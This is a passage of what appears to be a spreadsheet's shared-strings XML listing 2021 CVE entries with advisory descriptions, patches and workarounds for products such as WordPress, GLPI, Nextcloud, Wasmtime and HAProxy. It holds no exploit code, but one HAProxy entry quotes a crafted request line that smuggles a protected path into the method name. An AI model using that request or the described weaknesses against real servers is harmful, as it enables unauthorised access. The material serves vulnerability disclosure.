    <t>GlobalNewFiles is a MediaWiki extension maintained by Miraheze. Prior to commit number cee254e1b158cdb0ddbea716b1d3edc31fa4fb5d, the username column of the GlobalNewFiles special page is vulnerable to a stored XSS. Commit number cee254e1b158cdb0ddbea716b1d3edc31fa4fb5d contains a patch. As a workaround, one may disallow &lt;,&gt; (or other characters required to insert html/js) from being used in account names so an XSS is not possible.</t>
  </si>
  <si>
    <t>CVE-2021-39187</t>
  </si>
  <si>
    <t>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to version 4.10.3, Parse Server crashes when if a query request contains an invalid value for the `explain` option. This is due to a bug in the MongoDB Node.js driver which throws an exception that Parse Server cannot catch. There is a patch for this issue in version 4.10.3. No workarounds aside from upgrading are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-39189</t>
  </si>
  <si>
    <t>Pimcore is an open source data &amp; experience management platform. In versions prior to 10.1.3, it is possible to enumerate usernames via the forgot password functionality. This issue is fixed in version 10.1.3. As a workaround, one may apply the available patch manually.</t>
  </si>
  <si>
    <t>CVE-2021-39190</t>
  </si>
  <si>
    <t>The SCCM plugin for GLPI is a plugin to synchronize computers from SCCM (version 1802) to GLPI. In versions prior to 2.3.0, the Configuration page is publicly accessible in read-only mode. This issue is patched in version 2.3.0. No known workarounds exist.</t>
  </si>
  <si>
    <t>CVE-2021-39191</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In versions prior to 2.4.9.4, the 3rd-party init SSO functionality of mod_auth_openidc was reported to be vulnerable to an open redirect attack by supplying a crafted URL in the `target_link_uri` parameter. A patch in version 2.4.9.4 made it so that the `OIDCRedirectURLsAllowed` setting must be applied to the `target_link_uri` parameter. There are no known workarounds aside from upgrading to a patched version.</t>
  </si>
  <si>
    <t>CVE-2021-39192</t>
  </si>
  <si>
    <t>Ghost is a Node.js content management system. An error in the implementation of the limits service between versions 4.0.0 and 4.9.4 allows all authenticated users (including contributors) to view admin-level API keys via the integrations API endpoint, leading to a privilege escalation vulnerability. This issue is patched in Ghost version 4.10.0. As a workaround, disable all non-Administrator accounts to prevent API access. It is highly recommended to regenerate all API keys after patching or applying the workaround.</t>
  </si>
  <si>
    <t>CVE-2021-39193</t>
  </si>
  <si>
    <t>Frontier is Substrate's Ethereum compatibility layer. Prior to commit number 0b962f218f0cdd796dadfe26c3f09e68f7861b26, a bug in `pallet-ethereum` can cause invalid transactions to be included in the Ethereum block state in `pallet-ethereum` due to not validating the input data size. Any invalid transactions included this way have no possibility to alter the internal Ethereum or Substrate state. The transaction will appear to have be included, but is of no effect as it is rejected by the EVM engine. The impact is further limited by Substrate extrinsic size constraints. A patch is available in commit number 0b962f218f0cdd796dadfe26c3f09e68f7861b26. There are no workarounds aside from applying the patch.</t>
  </si>
  <si>
    <t>CVE-2021-39194</t>
  </si>
  <si>
    <t>kaml is an open source implementation of the YAML format with support for kotlinx.serialization. In affected versions attackers that could provide arbitrary YAML input to an application that uses kaml could cause the application to endlessly loop while parsing the input. This could result in resource starvation and denial of service. This only affects applications that use polymorphic serialization with the default tagged polymorphism style. Applications using the property polymorphism style are not affected. YAML input for a polymorphic type that provided a tag but no value for the object would trigger the issue. Version 0.35.3 or later contain the fix for this issue.</t>
  </si>
  <si>
    <t>CVE-2021-39195</t>
  </si>
  <si>
    <t>Misskey is an open source, decentralized microblogging platform. In affected versions a Server-Side Request Forgery vulnerability exists in "Upload from URL" and remote attachment handling. This could result in the disclosure of non-public information within the internal network. This has been fixed in 12.90.0. However, if you are using a proxy, you will need to take additional measures. As a workaround this exploit may be avoided by appropriately restricting access to private networks from the host where the application is running.</t>
  </si>
  <si>
    <t>CVE-2021-39196</t>
  </si>
  <si>
    <t>pcapture is an open source dumpcap web service interface . In affected versions this vulnerability allows an authenticated but unprivileged user to use the REST API to capture and download packets with no capture filter and without adequate permissions. This is important because the capture filters can effectively limit the scope of information that a user can see in the data captures. If no filter is present, then all data on the local network segment where the program is running can be captured and downloaded. v3.12 fixes this problem. There is no workaround, you must upgrade to v3.12 or greater.</t>
  </si>
  <si>
    <t>CVE-2021-39197</t>
  </si>
  <si>
    <t>better_errors is an open source replacement for the standard Rails error page with more information rich error pages. It is also usable outside of Rails in any Rack app as Rack middleware. better_errors prior to 2.8.0 did not implement CSRF protection for its internal requests. It also did not enforce the correct "Content-Type" header for these requests, which allowed a cross-origin "simple request" to be made without CORS protection. These together left an application with better_errors enabled open to cross-origin attacks. As a developer tool, better_errors documentation strongly recommends addition only to the `development` bundle group, so this vulnerability should only affect development environments. Please ensure that your project limits better_errors to the `development` group (or the non-Rails equivalent). Starting with release 2.8.x, CSRF protection is enforced. It is recommended that you upgrade to the latest release, or minimally to "~&gt; 2.8.3". There are no known workarounds to mitigate the risk of using older releases of better_errors.</t>
  </si>
  <si>
    <t>CVE-2021-39198</t>
  </si>
  <si>
    <t>OroCRM is an open source Client Relationship Management (CRM) application. Affected versions we found to suffer from a vulnerability which could an attacker is able to disqualify any Lead with a Cross-Site Request Forgery (CSRF) attack. There are no workarounds that address this vulnerability and all users are advised to update their package.</t>
  </si>
  <si>
    <t>CVE-2021-39199</t>
  </si>
  <si>
    <t>remark-html is an open source nodejs library which compiles Markdown to HTML. In affected versions the documentation of remark-html has mentioned that it was safe by default. In practice the default was never safe and had to be opted into. That is, user input was not sanitized. This means arbitrary HTML can be passed through leading to potential XSS attacks. The problem has been patched in 13.0.2 and 14.0.1: `remark-html` is now safe by default, and the implementation matches the documentation. On older affected versions, pass `sanitize: true` if you cannot update.</t>
  </si>
  <si>
    <t>CVE-2021-3920</t>
  </si>
  <si>
    <t>grav-plugin-admin is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-39200</t>
  </si>
  <si>
    <t>WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. In affected versions output data of the function wp_die() can be leaked under certain conditions, which can include data like nonces. It can then be used to perform actions on your behalf. This has been patched in WordPress 5.8.1, along with any older affected versions via minor releases. It's strongly recommended that you keep auto-updates enabled to receive the fix.</t>
  </si>
  <si>
    <t>CVE-2021-39201</t>
  </si>
  <si>
    <t>WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. ### Impact The issue allows an authenticated but low-privileged user (like contributor/author) to execute XSS in the editor. This bypasses the restrictions imposed on users who do not have the permission to post `unfiltered_html`. ### Patches This has been patched in WordPress 5.8, and will be pushed to older versions via minor releases (automatic updates). It's strongly recommended that you keep auto-updates enabled to receive the fix. ### References https://wordpress.org/news/category/releases/ https://hackerone.com/reports/1142140 ### For more information If you have any questions or comments about this advisory: * Open an issue in [HackerOne](https://hackerone.com/wordpress)</t>
  </si>
  <si>
    <t>CVE-2021-39202</t>
  </si>
  <si>
    <t>WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. In affected versions the widgets editor introduced in WordPress 5.8 beta 1 has improper handling of HTML input in the Custom HTML feature. This leads to stored XSS in the custom HTML widget. This has been patched in WordPress 5.8. It was only present during the testing/beta phase of WordPress 5.8.</t>
  </si>
  <si>
    <t>CVE-2021-39203</t>
  </si>
  <si>
    <t>WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. In affected versions authenticated users who don't have permission to view private post types/data can bypass restrictions in the block editor under certain conditions. This affected WordPress 5.8 beta during the testing period. It's fixed in the final 5.8 release.</t>
  </si>
  <si>
    <t>CVE-2021-39204</t>
  </si>
  <si>
    <t>Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, incorrectly handles resetting of HTTP/2 streams with excessive complexity. This can lead to high CPU utilization when a large number of streams are reset. This can result in a DoS condition. Pomerium versions 0.14.8 and 0.15.1 contain an upgraded envoy binary with this vulnerability patched.</t>
  </si>
  <si>
    <t>CVE-2021-39205</t>
  </si>
  <si>
    <t>Jitsi Meet is an open source video conferencing application. Versions prior to 2.0.6173 are vulnerable to client-side cross-site scripting via injecting properties into JSON objects that were not properly escaped. There are no known incidents related to this vulnerability being exploited in the wild. This issue is fixed in Jitsi Meet version 2.0.6173. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39206</t>
  </si>
  <si>
    <t>Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, contains two authorization related vulnerabilities CVE-2021-32777 and CVE-2021-32779. This may lead to incorrect routing or authorization policy decisions. With specially crafted requests, incorrect authorization or routing decisions may be made by Pomerium. Pomerium v0.14.8 and v0.15.1 contain an upgraded envoy binary with these vulnerabilities patched. This issue can only be triggered when using path prefix based policy. Removing any such policies should provide mitigation.</t>
  </si>
  <si>
    <t>CVE-2021-39207</t>
  </si>
  <si>
    <t>parlai is a framework for training and evaluating AI models on a variety of openly available dialogue datasets. In affected versions the package is vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitary code execution. This security bug is patched by avoiding unsafe loader users should update to version above v1.1.0. If upgrading is not possible then users can change the Loader used to SafeLoader as a workaround. See commit 507d066ef432ea27d3e201da08009872a2f37725 for details.</t>
  </si>
  <si>
    <t>CVE-2021-39208</t>
  </si>
  <si>
    <t>SharpCompress is a fully managed C# library to deal with many compression types and formats. Versions prior to 0.29.0 are vulnerable to partial path traversal. SharpCompress recreates a hierarchy of directories under destinationDirectory if ExtractFullPath is set to true in options. In order to prevent extraction outside the destination directory the destinationFileName path is verified to begin with fullDestinationDirectoryPath. However, prior to version 0.29.0, it is not enforced that fullDestinationDirectoryPath ends with slash. If the destinationDirectory is not slash terminated like `/home/user/dir` it is possible to create a file with a name thats begins as the destination directory one level up from the directory, i.e. `/home/user/dir.sh`. Because of the file name and destination directory constraints the arbitrary file creation impact is limited and depends on the use case. This issue is fixed in SharpCompress version 0.29.0.</t>
  </si>
  <si>
    <t>CVE-2021-39209</t>
  </si>
  <si>
    <t>GLPI is a free Asset and IT management software package. In versions prior to 9.5.6, a user who is logged in to GLPI can bypass Cross-Site Request Forgery (CSRF) protection in many places. This could allow a malicious actor to perform many actions on GLPI. This issue is fixed in version 9.5.6. There are no workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-3921</t>
  </si>
  <si>
    <t>CVE-2021-39210</t>
  </si>
  <si>
    <t>GLPI is a free Asset and IT management software package. In versions prior to 9.5.6, the cookie used to store the autologin cookie (when a user uses the "remember me" feature) is accessible by scripts. A malicious plugin that could steal this cookie would be able to use it to autologin. This issue is fixed in version 9.5.6. As a workaround, one may avoid using the "remember me" feature.</t>
  </si>
  <si>
    <t>CVE-2021-39211</t>
  </si>
  <si>
    <t>GLPI is a free Asset and IT management software package. Starting in version 9.2 and prior to version 9.5.6, the telemetry endpoint discloses GLPI and server information. This issue is fixed in version 9.5.6. As a workaround, remove the file `ajax/telemetry.php`, which is not needed for usual functions of GLPI.</t>
  </si>
  <si>
    <t>CVE-2021-39212</t>
  </si>
  <si>
    <t>ImageMagick is free software delivered as a ready-to-run binary distribution or as source code that you may use, copy, modify, and distribute in both open and proprietary applications. In affected versions and in certain cases, Postscript files could be read and written when specifically excluded by a `module` policy in `policy.xml`. ex. &lt;policy domain="module" rights="none" pattern="PS" /&gt;. The issue has been resolved in ImageMagick 7.1.0-7 and in 6.9.12-22. Fortunately, in the wild, few users utilize the `module` policy and instead use the `coder` policy that is also our workaround recommendation: &lt;policy domain="coder" rights="none" pattern="{PS,EPI,EPS,EPSF,EPSI}" /&gt;.</t>
  </si>
  <si>
    <t>CVE-2021-39213</t>
  </si>
  <si>
    <t>GLPI is a free Asset and IT management software package. Starting in version 9.1 and prior to version 9.5.6, GLPI with API Rest enabled is vulnerable to API bypass with custom header injection. This issue is fixed in version 9.5.6. One may disable API Rest as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-39214</t>
  </si>
  <si>
    <t>mitmproxy is an interactive, SSL/TLS-capable intercepting proxy. In mitmproxy 7.0.2 and below, a malicious client or server is able to perform HTTP request smuggling attacks through mitmproxy. This means that a malicious client/server could smuggle a request/response through mitmproxy as part of another request/response's HTTP message body. While a smuggled request is still captured as part of another request's body, it does not appear in the request list and does not go through the usual mitmproxy event hooks, where users may have implemented custom access control checks or input sanitization. Unless one uses mitmproxy to protect an HTTP/1 service, no action is required. The vulnerability has been fixed in mitmproxy 7.0.3 and above.</t>
  </si>
  <si>
    <t>CVE-2021-39215</t>
  </si>
  <si>
    <t>Jitsi Meet is an open source video conferencing application. In versions prior to 2.0.5963, a Prosody module allows the use of symmetrical algorithms to validate JSON web tokens. This means that tokens generated by arbitrary sources can be used to gain authorization to protected rooms. This issue is fixed in Jitsi Meet 2.0.5963. There are no known workarounds aside from updating.</t>
  </si>
  <si>
    <t>CVE-2021-39216</t>
  </si>
  <si>
    <t>Wasmtime is an open source runtime for WebAssembly &amp; WASI. In Wasmtime from version 0.19.0 and before version 0.30.0 there was a use-after-free bug when passing `externref`s from the host to guest Wasm content. To trigger the bug, you have to explicitly pass multiple `externref`s from the host to a Wasm instance at the same time, either by passing multiple `externref`s as arguments from host code to a Wasm function, or returning multiple `externref`s to Wasm from a multi-value return function defined in the host. If you do not have host code that matches one of these shapes, then you are not impacted. If Wasmtime's `VMExternRefActivationsTable` became filled to capacity after passing the first `externref` in, then passing in the second `externref` could trigger a garbage collection. However the first `externref` is not rooted until we pass control to Wasm, and therefore could be reclaimed by the collector if nothing else was holding a reference to it or otherwise keeping it alive. Then, when control was passed to Wasm after the garbage collection, Wasm could use the first `externref`, which at this point has already been freed. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. The bug has been fixed, and users should upgrade to Wasmtime 0.30.0. If you cannot upgrade Wasmtime yet, you can avoid the bug by disabling reference types support in Wasmtime by passing `false` to `wasmtime::Config::wasm_reference_types`.</t>
  </si>
  <si>
    <t>CVE-2021-39218</t>
  </si>
  <si>
    <t>Wasmtime is an open source runtime for WebAssembly &amp; WASI. In Wasmtime from version 0.26.0 and before version 0.30.0 is affected by a memory unsoundness vulnerability. There was an invalid free and out-of-bounds read and write bug when running Wasm that uses `externref`s in Wasmtime. To trigger this bug, Wasmtime needs to be running Wasm that uses `externref`s, the host creates non-null `externrefs`, Wasmtime performs a garbage collection (GC), and there has to be a Wasm frame on the stack that is at a GC safepoint where there are no live references at this safepoint, and there is a safepoint with live references earlier in this frame's function. Under this scenario, Wasmtime would incorrectly use the GC stack map for the safepoint from earlier in the function instead of the empty safepoint. This would result in Wasmtime treating arbitrary stack slots as `externref`s that needed to be rooted for GC. At the *next* GC, it would be determined that nothing was referencing these bogus `externref`s (because nothing could ever reference them, because they are not really `externref`s) and then Wasmtime would deallocate them and run `&lt;ExternRef as Drop&gt;::drop` on them. This results in a free of memory that is not necessarily on the heap (and shouldn't be freed at this moment even if it was), as well as potential out-of-bounds reads and writes. Even though support for `externref`s (via the reference types proposal) is enabled by default, unless you are creating non-null `externref`s in your host code or explicitly triggering GCs, you cannot be affected by this bug. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. This bug has been patched and users should upgrade to Wasmtime version 0.30.0. If you cannot upgrade Wasmtime at this time, you can avoid this bug by disabling the reference types proposal by passing `false` to `wasmtime::Config::wasm_reference_types`.</t>
  </si>
  <si>
    <t>CVE-2021-39219</t>
  </si>
  <si>
    <t>Wasmtime is an open source runtime for WebAssembly &amp; WASI. Wasmtime before version 0.30.0 is affected by a type confusion vulnerability. As a Rust library the `wasmtime` crate clearly marks which functions are safe and which are `unsafe`, guaranteeing that if consumers never use `unsafe` then it should not be possible to have memory unsafety issues in their embeddings of Wasmtime. An issue was discovered in the safe API of `Linker::func_*` APIs. These APIs were previously not sound when one `Engine` was used to create the `Linker` and then a different `Engine` was used to create a `Store` and then the `Linker` was used to instantiate a module into that `Store`. Cross-`Engine` usage of functions is not supported in Wasmtime and this can result in type confusion of function pointers, resulting in being able to safely call a function with the wrong type. Triggering this bug requires using at least two `Engine` values in an embedding and then additionally using two different values with a `Linker` (one at the creation time of the `Linker` and another when instantiating a module with the `Linker`). It's expected that usage of more-than-one `Engine` in an embedding is relatively rare since an `Engine` is intended to be a globally shared resource, so the expectation is that the impact of this issue is relatively small. The fix implemented is to change this behavior to `panic!()` in Rust instead of silently allowing it. Using different `Engine` instances with a `Linker` is a programmer bug that `wasmtime` catches at runtime. This bug has been patched and users should upgrade to Wasmtime version 0.30.0. If you cannot upgrade Wasmtime and are using more than one `Engine` in your embedding it's recommended to instead use only one `Engine` for the entire program if possible. An `Engine` is designed to be a globally shared resource that is suitable to have only one for the lifetime of an entire process. If using multiple `Engine`s is required then code should be audited to ensure that `Linker` is only used with one `Engine`.</t>
  </si>
  <si>
    <t>CVE-2021-3922</t>
  </si>
  <si>
    <t>A race condition vulnerability was reported in IMController, a software component of Lenovo System Interface Foundation, prior to version 1.1.20.3 that could allow a local attacker to connect and interact with the IMController child process' named pipe.</t>
  </si>
  <si>
    <t>CVE-2021-39220</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform The Nextcloud Mail application prior to versions 1.10.4 and 1.11.0 does by default not render images in emails to not leak the read state or user IP. The privacy filter failed to filter images with a relative protocol. It is recommended that the Nextcloud Mail application is upgraded to 1.10.4 or 1.11.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39221</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform. The Nextcloud Contacts application prior to version 4.0.3 was vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, a user would need to right-click on a malicious file and open the file in a new tab. Due the strict Content-Security-Policy shipped with Nextcloud, this issue is not exploitable on modern browsers supporting Content-Security-Policy. It is recommended that the Nextcloud Contacts application is upgraded to 4.0.3. As a workaround, one may use a browser that has support for Content-Security-Policy.</t>
  </si>
  <si>
    <t>CVE-2021-39222</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform. The Nextcloud Talk application was vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, a user would need to right-click on a malicious file and open the file in a new tab. Due the strict Content-Security-Policy shipped with Nextcloud, this issue is not exploitable on modern browsers supporting Content-Security-Policy. It is recommended that the Nextcloud Talk application is upgraded to patched versions 10.0.7, 10.1.4, 11.1.2, 11.2.0 or 12.0.0. As a workaround, use a browser that has support for Content-Security-Policy.</t>
  </si>
  <si>
    <t>CVE-2021-39223</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform. The Nextcloud Richdocuments application prior to versions 3.8.6 and 4.2.3 returned verbatim exception messages to the user. This could result in a full path disclosure on shared files. (e.g. an attacker could see that the file `shared.txt` is located within `/files/$username/Myfolder/Mysubfolder/shared.txt`). It is recommended that the Richdocuments application is upgraded to 3.8.6 or 4.2.3. As a workaround, disable the Richdocuments application in the app settings.</t>
  </si>
  <si>
    <t>CVE-2021-39224</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform. The Nextcloud OfficeOnline application prior to version 1.1.1 returned verbatim exception messages to the user. This could result in a full path disclosure on shared files. (e.g. an attacker could see that the file `shared.txt` is located within `/files/$username/Myfolder/Mysubfolder/shared.txt`). It is recommended that the OfficeOnline application is upgraded to 1.1.1. As a workaround, one may disable the OfficeOnline application in the app settings.</t>
  </si>
  <si>
    <t>CVE-2021-39225</t>
  </si>
  <si>
    <t>Nextcloud is an open-source, self-hosted productivity platform. A missing permission check in Nextcloud Deck before 1.2.9, 1.4.5 and 1.5.3 allows another authenticated users to access Deck cards of another user. It is recommended that the Nextcloud Deck App is upgraded to 1.2.9, 1.4.5 or 1.5.3. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39226</t>
  </si>
  <si>
    <t>Grafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot "public_mode" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot "public_mode" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.</t>
  </si>
  <si>
    <t>CVE-2021-39227</t>
  </si>
  <si>
    <t>ZRender is a lightweight graphic library providing 2d draw for Apache ECharts. In versions prior to 5.2.1, using `merge` and `clone` helper methods in the `src/core/util.ts` module results in prototype pollution. It affects the popular data visualization library Apache ECharts, which uses and exports these two methods directly. The GitHub Security Advisory page for this vulnerability contains a proof of concept. This issue is patched in ZRender version 5.2.1. One workaround is available: Check if there is `__proto__` in the object keys. Omit it before using it as an parameter in these affected methods. Or in `echarts.util.merge` and `setOption` if project is using ECharts.</t>
  </si>
  <si>
    <t>CVE-2021-39228</t>
  </si>
  <si>
    <t>Tremor is an event processing system for unstructured data. A vulnerability exists between versions 0.7.2 and 0.11.6. This vulnerability is a memory safety Issue when using `patch` or `merge` on `state` and assign the result back to `state`. In this case, affected versions of Tremor and the tremor-script crate maintains references to memory that might have been freed already. And these memory regions can be accessed by retrieving the `state`, e.g. send it over TCP or HTTP. This requires the Tremor server (or any other program using tremor-script) to execute a tremor-script script that uses the mentioned language construct. The issue has been patched in version 0.11.6 by removing the optimization and always cloning the target expression of a Merge or Patch. If an upgrade is not possible, a possible workaround is to avoid the optimization by introducing a temporary variable and not immediately reassigning to `state`.</t>
  </si>
  <si>
    <t>CVE-2021-39229</t>
  </si>
  <si>
    <t>Apprise is an open source library which allows you to send a notification to almost all of the most popular notification services available. In affected versions users who use Apprise granting them access to the IFTTT plugin (which just comes out of the box) are subject to a denial of service attack on an inefficient regular expression. The vulnerable regular expression is [here](https://github.com/caronc/apprise/blob/0007eade20934ddef0aba38b8f1aad980cfff253/apprise/plugins/NotifyIFTTT.py#L356-L359). The problem has been patched in release version 0.9.5.1. Users who are unable to upgrade are advised to remove `apprise/plugins/NotifyIFTTT.py` to eliminate the service.</t>
  </si>
  <si>
    <t>CVE-2021-39230</t>
  </si>
  <si>
    <t>Butter is a system usability utility. Due to a kernel error the JPNS kernel is being discontinued. Affected users are recommend to update to the Trinity kernel. There are no workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-39231</t>
  </si>
  <si>
    <t>In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.</t>
  </si>
  <si>
    <t>CVE-2021-39232</t>
  </si>
  <si>
    <t>In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.</t>
  </si>
  <si>
    <t>CVE-2021-39233</t>
  </si>
  <si>
    <t>In Apache Ozone versions prior to 1.2.0, Container related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.</t>
  </si>
  <si>
    <t>CVE-2021-39234</t>
  </si>
  <si>
    <t>In Apache Ozone versions prior to 1.2.0, Authenticated users knowing the ID of an existing block can craft specific request allowing access those blocks, bypassing other security checks like ACL.</t>
  </si>
  <si>
    <t>CVE-2021-39235</t>
  </si>
  <si>
    <t>In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.</t>
  </si>
  <si>
    <t>CVE-2021-39236</t>
  </si>
  <si>
    <t>In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.</t>
  </si>
  <si>
    <t>CVE-2021-39237</t>
  </si>
  <si>
    <t>Certain HP LaserJet, HP LaserJet Managed, HP PageWide, and HP PageWide Managed printers may be vulnerable to potential information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-39238</t>
  </si>
  <si>
    <t>Certain HP Enterprise LaserJet, HP LaserJet Managed, HP Enterprise PageWide, HP PageWide Managed products may be vulnerable to potential buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39239</t>
  </si>
  <si>
    <t>A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.</t>
  </si>
  <si>
    <t>CVE-2021-3924</t>
  </si>
  <si>
    <t>grav is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</t>
  </si>
  <si>
    <t>CVE-2021-39240</t>
  </si>
  <si>
    <t>An issue was discovered in HAProxy 2.2 before 2.2.16, 2.3 before 2.3.13, and 2.4 before 2.4.3. It does not ensure that the scheme and path portions of a URI have the expected characters. For example, the authority field (as observed on a target HTTP/2 server) might differ from what the routing rules were intended to achieve.</t>
  </si>
  <si>
    <t>CVE-2021-39241</t>
  </si>
  <si>
    <t>An issue was discovered in HAProxy 2.0 before 2.0.24, 2.2 before 2.2.16, 2.3 before 2.3.13, and 2.4 before 2.4.3. An HTTP method name may contain a space followed by the name of a protected resource. It is possible that a server would interpret this as a request for that protected resource, such as in the "GET /admin? HTTP/1.1 /static/images HTTP/1.1" example.</t>
  </si>
  <si>
    <t>CVE-2021-39242</t>
  </si>
  <si>
    <t>An issue was discovered in HAProxy 2.2 before 2.2.16, 2.3 before 2.3.13, and 2.4 before 2.4.3. It can lead to a situation with an attacker-controlled HTTP Host header, because a mismatch between Host and authority is mishandled.</t>
  </si>
  <si>
    <t>CVE-2021-39243</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) exists on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices via any CGI endpoint. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.</t>
  </si>
  <si>
    <t>CVE-2021-39244</t>
  </si>
  <si>
    <t>Authenticated Semi-Blind Command Injection (via Parameter Injection) exists on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices via the getlogs.cgi tcpdump feature. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.</t>
  </si>
  <si>
    <t>CVE-2021-39245</t>
  </si>
  <si>
    <t>Hardcoded .htaccess Credentials for getlogs.cgi exist on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.</t>
  </si>
  <si>
    <t>CVE-2021-39246</t>
  </si>
  <si>
    <t>Tor Browser through 10.5.6 and 11.x through 11.0a4 allows a correlation attack that can compromise the privacy of visits to v2 onion addresses. Exact timestamps of these onion-service visits are logged locally, and an attacker might be able to compare them to timestamp data collected by the destination server (or collected by a rogue site within the Tor network).</t>
  </si>
  <si>
    <t>CVE-2021-39247</t>
  </si>
  <si>
    <t>Zint Barcode Generator before 2.10.0 has a one-byte buffer over-read, related to is_last_single_ascii in code1.c, and rs_encode_uint in reedsol.c.</t>
  </si>
  <si>
    <t>CVE-2021-39248</t>
  </si>
  <si>
    <t>Open edX through Lilac.1 allows XSS in common/static/common/js/discussion/utils.js via crafted LaTeX content within a discussion.</t>
  </si>
  <si>
    <t>CVE-2021-39249</t>
  </si>
  <si>
    <t>Invision Community (aka IPS Community Suite or IP-Board) before 4.6.5.1 allows reflected XSS because the filenames of uploaded files become predictable through a brute-force attack against the PHP mt_rand function.</t>
  </si>
  <si>
    <t>CVE-2021-39250</t>
  </si>
  <si>
    <t>Invision Community (aka IPS Community Suite or IP-Board) before 4.6.5.1 allows stored XSS, with resultant code execution, because an uploaded file can be placed in an IFRAME element within user-generated content. For code execution, the attacker can rely on the ability of an admin to install widgets, disclosure of the admin session ID in a Referer header, and the ability of an admin to use the templating engine (e.g., Edit HTML).</t>
  </si>
  <si>
    <t>CVE-2021-39251</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause a NULL pointer dereference in ntfs_extent_inode_open in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39252</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause an out-of-bounds read in ntfs_ie_lookup in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39253</t>
  </si>
